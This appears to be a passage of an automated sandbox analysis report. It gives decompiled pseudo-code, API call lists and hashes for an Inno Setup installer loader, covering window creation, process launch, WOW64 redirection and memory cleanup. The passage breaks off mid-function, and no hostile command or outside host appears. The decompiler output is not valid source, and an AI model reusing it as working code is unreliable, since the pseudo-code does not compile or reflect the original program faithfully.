0x00409b6f
0x00409b6f
0x00409b6d
0x00409b71
0x00409b82
0x00409b79
0x00409b7e
0x00409b7e
0x00409b89
0x00409b98
0x00409b98
0x00000000
0x00409b89
0x00409b3b
0x00000000
0x00409bb1

APIs

GetSystemInfo.KERNEL32(?), ref: 00409B1A
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B25
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B66
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B98
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BA8

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 7af558caf9214b1ffc905ac10295ae15313c48f976b13830cabd187caed91fec
Instruction ID: 77b25fd1770a56ea432c22402e8e705fce68956b85bc5b66870c9d0fe5d52f3a
Opcode Fuzzy Hash: 7af558caf9214b1ffc905ac10295ae15313c48f976b13830cabd187caed91fec
Instruction Fuzzy Hash: 49219FB12003046BDA30EA599C85E57B7F8AB85370F04492AFA85E32C3D379FD44C669

Uniqueness

Uniqueness Score: -1.00%

Function 004051D4 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051D4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100); // executed
				_t19 = _t5;
				if(_t5 <= 0) {
					return E0040322C(_t10, _t18);
				}
				return E00403278(_t10, _t5 - 1,  &_v260, _t19);
			}

0x004051df
0x004051e1
0x004051f2
0x004051f7
0x004051f9
0x00000000
0x00405211
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,0040529F,?,00000000,0040537E), ref: 004051F2

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: be7cc8d34f467cf627e4f0a13923a1311ff0080240f5bfd55c0e160e575e3a07
Instruction ID: 69d9b64736de4715eeb7cbb6d303e2114b5c7679e66e461fa217f8d609c82f9f
Opcode Fuzzy Hash: be7cc8d34f467cf627e4f0a13923a1311ff0080240f5bfd55c0e160e575e3a07
Instruction Fuzzy Hash: B5E0D87170021827D710A9A99C86EFB725CDB9C310F0002BFB914E73C2EDB49E804AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0040A0C0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				struct HINSTANCE__* _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				struct HWND__* _t29;
				intOrPtr _t30;
				intOrPtr _t32;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t48;
				int _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t58;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t76;
				void* _t79;

				_t78 = __esi;
				_t77 = __edi;
				_t61 = __ecx;
				_t60 = __ebx;
				_t80 =  *0x408b0040 | 0x00000050;
				SetLastError(??);
				E00409620(0x61, __ebx, _t61, __edi, __esi,  *0x408b0040 | 0x00000050);
				E00402F24();
				E00406F68(0x40cdec);
				_t24 =  *0x40c014; // 0x400000
				_t25 = CreateWindowExA(0, "STATIC", "InnoSetupLdrWindow", 0, 0, 0, 0, 0, 0, 0, _t24, 0); // executed
				 *0x40b244 = _t25;
				_t26 =  *0x40b244; // 0x4023c
				 *0x40cde4 = SetWindowLongA(_t26, 0xfffffffc, E004098F0);
				_t29 =  *0x40b244; // 0x4023c
				 *(_t79 - 0x3c) = _t29;
				 *((char*)(_t79 - 0x38)) = 0;
				_t30 =  *0x40cdf4; // 0x413010
				_t4 = _t30 + 0x20; // 0x17727f
				 *((intOrPtr*)(_t79 - 0x34)) =  *_t4;
				 *((char*)(_t79 - 0x30)) = 0;
				_t32 =  *0x40cdf4; // 0x413010
				_t7 = _t32 + 0x24; // 0xd400
				 *((intOrPtr*)(_t79 - 0x2c)) =  *_t7;
				 *((char*)(_t79 - 0x28)) = 0;
				E0040515C("/SL5=\"$%x,%d,%d,", 2, _t79 - 0x3c, _t79 - 0x10);
				_t70 =  *0x40cde8; // 0x20d03cc
				E004032FC(_t79 - 0x10, _t70);
				E004032FC(_t79 - 0x10, 0x40a338);
				_push(_t79 - 0x10);
				E00406B54(_t79 - 0x24, __ebx, 2, __edi, __esi, _t80);
				_pop(_t43);
				E004032FC(_t43,  *((intOrPtr*)(_t79 - 0x24)));
				_t45 =  *0x40ce00; // 0x20e7e60, executed
				E0040997C(_t45, __ebx, 0x40b240,  *((intOrPtr*)(_t79 - 0x10)), __edi, __esi, _t80); // executed
				if( *0x40b23c != 0xffffffff) {
					_t58 =  *0x40b23c; // 0x0
					E0040985C(_t58, 0x40b240);
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(0x40a25f);
				_t48 =  *0x40cdec; // 0x0
				_t49 = E00402924(_t48);
				if( *0x40ce00 != 0) {
					_t76 =  *0x40ce00; // 0x20e7e60
					_t49 = E004094B0(0, _t76, 0xfa, 0x32); // executed
				}
				if( *0x40cdf8 != 0) {
					_t55 =  *0x40cdf8; // 0x20e7da4
					_t49 = RemoveDirectoryA(E00403414(_t55)); // executed
				}
				if( *0x40b244 != 0) {
					_t49 =  *0x40b244; // 0x4023c
					_push(_t49); // executed
					L00404534(); // executed
				}
				if( *0x40cddc != 0) {
					_t50 =  *0x40cddc; // 0x0
					_t66 =  *0x40cde0; // 0x1
					E0040357C(_t50, _t60, _t66, E00408BE8, _t77, _t78);
					_t52 =  *0x40cddc; // 0x0
					E004025AC(_t52);
					 *0x40cddc = 0;
					return 0;
				}
				return _t49;
			}

0x0040a0c0
0x0040a0c0
0x0040a0c0
0x0040a0c0
0x0040a0ca
0x0040a0cc
0x0040a0d3
0x0040a0d8
0x0040a0e2
0x0040a0e9
0x0040a109
0x0040a10e
0x0040a11a
0x0040a125
0x0040a12e
0x0040a133
0x0040a136
0x0040a13a
0x0040a13f
0x0040a142
0x0040a145
0x0040a149
0x0040a14e
0x0040a151
0x0040a154
0x0040a165
0x0040a16d
0x0040a173
0x0040a180
0x0040a188
0x0040a18c
0x0040a194
0x0040a195
0x0040a1a2
0x0040a1a7
0x0040a1b3
0x0040a1b5
0x0040a1ba
0x0040a1ba
0x0040a1c1
0x0040a1c4
0x0040a1c7
0x0040a1cc
0x0040a1d1
0x0040a1dd
0x0040a1eb
0x0040a1f3
0x0040a1f3
0x0040a1ff
0x0040a201
0x0040a20c
0x0040a20c
0x0040a218
0x0040a21a
0x0040a21f
0x0040a220
0x0040a220
0x0040a22c
0x0040a22e
0x0040a233
0x0040a23e
0x0040a243
0x0040a248
0x0040a24f
0x00000000
0x0040a24f
0x0040a254

APIs

SetLastError.KERNEL32 ref: 0040A0CC

Part of subcall function 00409620: GetLastError.KERNEL32(00000000,004096C3,?,0040B240,?,020E7E60), ref: 00409644

CreateWindowExA.USER32 ref: 0040A109
SetWindowLongA.USER32 ref: 0040A120

Part of subcall function 00406B54: GetCommandLineA.KERNEL32(00000000,00406B98,?,?,?,?,00000000,?,0040A191,?,?,0004023C,000000FC,004098F0,00000000,STATIC), ref: 00406B6C

Part of subcall function 0040997C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A74,020E7E60,00409A68,00000000,00409A4F), ref: 004099EC
Part of subcall function 0040997C: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A74,020E7E60,00409A68,00000000), ref: 00409A00
Part of subcall function 0040997C: MsgWaitForMultipleObjects.USER32 ref: 00409A19
Part of subcall function 0040997C: GetExitCodeProcess.KERNEL32 ref: 00409A2B
Part of subcall function 0040997C: CloseHandle.KERNEL32(?,?,0040B240,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A34

RemoveDirectoryA.KERNEL32(00000000,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A20C
740C9840.USER32(0004023C,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A220

Strings

InnoSetupLdrWindow, xrefs: 0040A0FD
/SL5="$%x,%d,%d,, xrefs: 0040A160
STATIC, xrefs: 0040A102

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcessWindow$C9840CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 1169070173-3001827809
Opcode ID: 82ea3f65868a7fc35517ffd3b00d0faccc64800910088765ef421502eb7a75b0
Instruction ID: f53e61771edf38aee078511e926c03575119a135ecdc43b76d793b756d8fb091
Opcode Fuzzy Hash: 82ea3f65868a7fc35517ffd3b00d0faccc64800910088765ef421502eb7a75b0
Instruction Fuzzy Hash: D341F870A00205DFD710EBA9EE86B997BA5EB84304F10427BF510B73E2DB789845DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040907C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0040907C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				char _t8;
				intOrPtr _t22;
				intOrPtr _t27;

				_t16 = __ebx;
				_push(0);
				_push(__ebx);
				_push(_t27);
				_push(0x409115);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27;
				 *0x40cc98 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64DisableWow64FsRedirection");
				 *0x40cc9c = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64RevertWow64FsRedirection");
				if( *0x40cc98 == 0 ||  *0x40cc9c == 0) {
					_t8 = 0;
				} else {
					_t8 = 1;
				}
				 *0x40cca0 = _t8;
				E00406F78("shell32.dll", _t16, 0x8000); // executed
				E0040725C(0x4c783afb,  &_v8);
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(E0040911C);
				return E00403198( &_v8);
			}

0x0040907c
0x0040907f
0x00409081
0x00409086
0x00409087
0x0040908c
0x0040908f
0x004090a7
0x004090c1
0x004090cd
0x004090d8
0x004090dc
0x004090dc
0x004090dc
0x004090de
0x004090ed
0x004090fa
0x00409101
0x00409104
0x00409107
0x00409114

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409115,?,?,?,?,00000000,?,00409C4C), ref: 0040909C
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090A2
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409115,?,?,?,?,00000000,?,00409C4C), ref: 004090B6
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090BC

Strings

kernel32.dll, xrefs: 00409097, 004090B1
Wow64DisableWow64FsRedirection, xrefs: 00409092
Wow64RevertWow64FsRedirection, xrefs: 004090AC
shell32.dll, xrefs: 004090E8

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 94075723c8fc2a482caac1cde2f730534f58b05307c5555a8722b7be9fa8d048
Instruction ID: 88bc304fd83d4713772702a109e3d5ffa4488b1fbb23ea048bed5bab67655cff
Opcode Fuzzy Hash: 94075723c8fc2a482caac1cde2f730534f58b05307c5555a8722b7be9fa8d048
Instruction Fuzzy Hash: EF017C70208342EEFB10BB62DC4BB163AA8D785718F60447BB508BA2D3DA7C5C04CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0AD Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0040A0AD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				int _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t76;
				void* _t77;

				_t77 = __eflags;
				_t75 = __esi;
				_t74 = __edi;
				_t56 = __ebx;
				_pop(_t65);
				 *[fs:eax] = _t65;
				E00406F68(0x40cdec);
				_t20 =  *0x40c014; // 0x400000
				_t21 = CreateWindowExA(0, "STATIC", "InnoSetupLdrWindow", 0, 0, 0, 0, 0, 0, 0, _t20, 0); // executed
				 *0x40b244 = _t21;
				_t22 =  *0x40b244; // 0x4023c
				 *0x40cde4 = SetWindowLongA(_t22, 0xfffffffc, E004098F0);
				_t25 =  *0x40b244; // 0x4023c
				 *(_t76 - 0x3c) = _t25;
				 *((char*)(_t76 - 0x38)) = 0;
				_t26 =  *0x40cdf4; // 0x413010
				_t4 = _t26 + 0x20; // 0x17727f
				 *((intOrPtr*)(_t76 - 0x34)) =  *_t4;
				 *((char*)(_t76 - 0x30)) = 0;
				_t28 =  *0x40cdf4; // 0x413010
				_t7 = _t28 + 0x24; // 0xd400
				 *((intOrPtr*)(_t76 - 0x2c)) =  *_t7;
				 *((char*)(_t76 - 0x28)) = 0;
				E0040515C("/SL5=\"$%x,%d,%d,", 2, _t76 - 0x3c, _t76 - 0x10);
				_t67 =  *0x40cde8; // 0x20d03cc
				E004032FC(_t76 - 0x10, _t67);
				E004032FC(_t76 - 0x10, 0x40a338);
				_push(_t76 - 0x10);
				E00406B54(_t76 - 0x24, __ebx, 2, __edi, __esi, _t77);
				_pop(_t39);
				E004032FC(_t39,  *((intOrPtr*)(_t76 - 0x24)));
				_t41 =  *0x40ce00; // 0x20e7e60, executed
				E0040997C(_t41, __ebx, 0x40b240,  *((intOrPtr*)(_t76 - 0x10)), __edi, __esi, _t77); // executed
				if( *0x40b23c != 0xffffffff) {
					_t54 =  *0x40b23c; // 0x0
					E0040985C(_t54, 0x40b240);
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x40a25f);
				_t44 =  *0x40cdec; // 0x0
				_t45 = E00402924(_t44);
				if( *0x40ce00 != 0) {
					_t73 =  *0x40ce00; // 0x20e7e60
					_t45 = E004094B0(0, _t73, 0xfa, 0x32); // executed
				}
				if( *0x40cdf8 != 0) {
					_t51 =  *0x40cdf8; // 0x20e7da4
					_t45 = RemoveDirectoryA(E00403414(_t51)); // executed
				}
				if( *0x40b244 != 0) {
					_t45 =  *0x40b244; // 0x4023c
					_push(_t45); // executed
					L00404534(); // executed
				}
				if( *0x40cddc != 0) {
					_t46 =  *0x40cddc; // 0x0
					_t63 =  *0x40cde0; // 0x1
					E0040357C(_t46, _t56, _t63, E00408BE8, _t74, _t75);
					_t48 =  *0x40cddc; // 0x0
					E004025AC(_t48);
					 *0x40cddc = 0;
					return 0;
				}
				return _t45;
			}

0x0040a0ad
0x0040a0ad
0x0040a0ad
0x0040a0ad
0x0040a0af
0x0040a0b2
0x0040a0e2
0x0040a0e9
0x0040a109
0x0040a10e
0x0040a11a
0x0040a125
0x0040a12e
0x0040a133
0x0040a136
0x0040a13a
0x0040a13f
0x0040a142
0x0040a145
0x0040a149
0x0040a14e
0x0040a151
0x0040a154
0x0040a165
0x0040a16d
0x0040a173
0x0040a180
0x0040a188
0x0040a18c
0x0040a194
0x0040a195
0x0040a1a2
0x0040a1a7
0x0040a1b3
0x0040a1b5
0x0040a1ba
0x0040a1ba
0x0040a1c1
0x0040a1c4
0x0040a1c7
0x0040a1cc
0x0040a1d1
0x0040a1dd
0x0040a1eb
0x0040a1f3
0x0040a1f3
0x0040a1ff
0x0040a201
0x0040a20c
0x0040a20c
0x0040a218
0x0040a21a
0x0040a21f
0x0040a220
0x0040a220
0x0040a22c
0x0040a22e
0x0040a233
0x0040a23e
0x0040a243
0x0040a248
0x0040a24f
0x00000000
0x0040a24f
0x0040a254

APIs

CreateWindowExA.USER32 ref: 0040A109
SetWindowLongA.USER32 ref: 0040A120

Part of subcall function 00406B54: GetCommandLineA.KERNEL32(00000000,00406B98,?,?,?,?,00000000,?,0040A191,?,?,0004023C,000000FC,004098F0,00000000,STATIC), ref: 00406B6C

Part of subcall function 0040997C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A74,020E7E60,00409A68,00000000,00409A4F), ref: 004099EC
Part of subcall function 0040997C: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A74,020E7E60,00409A68,00000000), ref: 00409A00
Part of subcall function 0040997C: MsgWaitForMultipleObjects.USER32 ref: 00409A19
Part of subcall function 0040997C: GetExitCodeProcess.KERNEL32 ref: 00409A2B
Part of subcall function 0040997C: CloseHandle.KERNEL32(?,?,0040B240,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A34

RemoveDirectoryA.KERNEL32(00000000,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A20C
740C9840.USER32(0004023C,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A220

Strings

InnoSetupLdrWindow, xrefs: 0040A0FD
/SL5="$%x,%d,%d,, xrefs: 0040A160
STATIC, xrefs: 0040A102

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$C9840CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 1029115379-3001827809
Opcode ID: 4ab88d8c6353bbfd7b98d0f688a4316c6cf5062df9c9579f3b13b1076451e611
Instruction ID: 8ec41598f4426bcb2878005aaf66d82a47ad9f31ec8bfd5f50b1c2167765569b
Opcode Fuzzy Hash: 4ab88d8c6353bbfd7b98d0f688a4316c6cf5062df9c9579f3b13b1076451e611
Instruction Fuzzy Hash: 3F410670600204DFD710EBA9EE85B9A7BA5EB88304F10827BF510B73E1DB789845CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040997C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040997C(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct _STARTUPINFOA _v76;
				void* _v88;
				void* _v92;
				int _t22;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x409a4f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x409a68);
				_push(__eax);
				_push(0x409a74);
				_push(__edx);
				E004033B4();
				E0040277C( &_v76, 0x44);
				_v76.cb = 0x44;
				_t22 = CreateProcessA(0, E00403414(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t59 = _t22;
				if(_t22 == 0) {
					E00409620(0x62, _t41, 0, _t51, _t53, _t59);
				}
				CloseHandle(_v88);
				do {
					E00409950();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0xff) == 1);
				E00409950();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E00409A56);
				return E00403198( &_v8);
			}

0x00409987
0x0040998a
0x0040998c
0x0040998e
0x00409992
0x00409993
0x00409998
0x0040999b
0x0040999e
0x004099a3
0x004099a4
0x004099a9
0x004099b2
0x004099c1
0x004099c6
0x004099ec
0x004099f1
0x004099f3
0x004099f7
0x004099f7
0x00409a00
0x00409a05
0x00409a05
0x00409a1e
0x00409a21
0x00409a2b
0x00409a34
0x00409a3b
0x00409a3e
0x00409a41
0x00409a4e

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A74,020E7E60,00409A68,00000000,00409A4F), ref: 004099EC
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A74,020E7E60,00409A68,00000000), ref: 00409A00
MsgWaitForMultipleObjects.USER32 ref: 00409A19
GetExitCodeProcess.KERNEL32 ref: 00409A2B
CloseHandle.KERNEL32(?,?,0040B240,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A34

Part of subcall function 00409620: GetLastError.KERNEL32(00000000,004096C3,?,0040B240,?,020E7E60), ref: 00409644

Strings

D, xrefs: 004099C6

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: 236e1cbb77f6dd5ccff7f36973946bafd6119ff77f15eec21927737d1565786b
Instruction ID: 6eb948507c4ec5679b074c1bd2c95f4bb48359ca2bbaaf6d619a7146313ed34b
Opcode Fuzzy Hash: 236e1cbb77f6dd5ccff7f36973946bafd6119ff77f15eec21927737d1565786b
Instruction Fuzzy Hash: 691142B1A002486EDB10EBE68C52F9EB7ACEF48714F50113BB604F72C6DA785D048A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E004019DC() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t24;

				_t22 = _t24;
				if( *0x40c415 == 0) {
					return _t2;
				} else {
					_push(_t22);
					_push(E00401AB4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t24;
					if( *0x40c032 != 0) {
						_push(0x40c41c);
						L00401274();
					}
					 *0x40c415 = 0;
					_t3 =  *0x40c474; // 0x0
					LocalFree(_t3);
					 *0x40c474 = 0;
					_t18 =  *0x40c43c; // 0x40c43c
					while(_t18 != 0x40c43c) {
						_t1 = _t18 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t18 =  *_t18;
					}
					E004012DC(0x40c43c);
					E004012DC(0x40c44c);
					E004012DC(0x40c478);
					_t14 =  *0x40c434; // 0x0
					while(_t14 != 0) {
						 *0x40c434 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40c434; // 0x0
					}
					_pop( *[fs:0x0]);
					_push(0x401abb);
					if( *0x40c032 != 0) {
						_push(0x40c41c);
						L0040127C();
					}
					_push(0x40c41c);
					L00401284();
					return _t14;
				}
			}

0x004019dd
0x004019e7
0x00401abd
0x004019ed
0x004019ef
0x004019f0
0x004019f5
0x004019f8
0x00401a02
0x00401a04
0x00401a09
0x00401a09
0x00401a0e
0x00401a15
0x00401a1b
0x00401a22
0x00401a27
0x00401a41
0x00401a36
0x00401a3a
0x00401a3f
0x00401a3f
0x00401a4e
0x00401a58
0x00401a62
0x00401a67
0x00401a6e
0x00401a72
0x00401a79
0x00401a7e
0x00401a83
0x00401a87
0x00401a91
0x00401a9d
0x00401a9f
0x00401aa4
0x00401aa4
0x00401aa9
0x00401aae
0x00401ab3
0x00401ab3

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(00000000,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 2760f6fc436d2282df077fa3fe2c561b0ff429e9c23b98cc44d100e589fe962f
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 2760f6fc436d2282df077fa3fe2c561b0ff429e9c23b98cc44d100e589fe962f
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403D02 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403D02(int __eax) {
				intOrPtr* _t7;
				intOrPtr* _t8;
				signed int _t15;
				signed int _t19;
				intOrPtr _t20;
				unsigned int _t21;
				char* _t29;
				char* _t30;
				void* _t46;

				 *0x40c020 = __eax;
				if( *0x40c030 == 0) {
					goto L5;
				} else {
					_t46 =  *0x40c414 - 1;
					if(_t46 < 0) {
						L17:
						ExitProcess( *0x40c020); // executed
					} else {
						if(_t46 == 0 || __eax != 0) {
							while(1) {
								L5:
								_t7 =  *0x40c024; // 0x0
								_t8 = _t7;
								if(_t8 == 0) {
									break;
								}
								 *0x40c024 = 0;
								 *_t8();
							}
							if( *0x40c028 != 0) {
								_t19 =  *0x40c020; // 0x0
								_t29 = "  at 00000000";
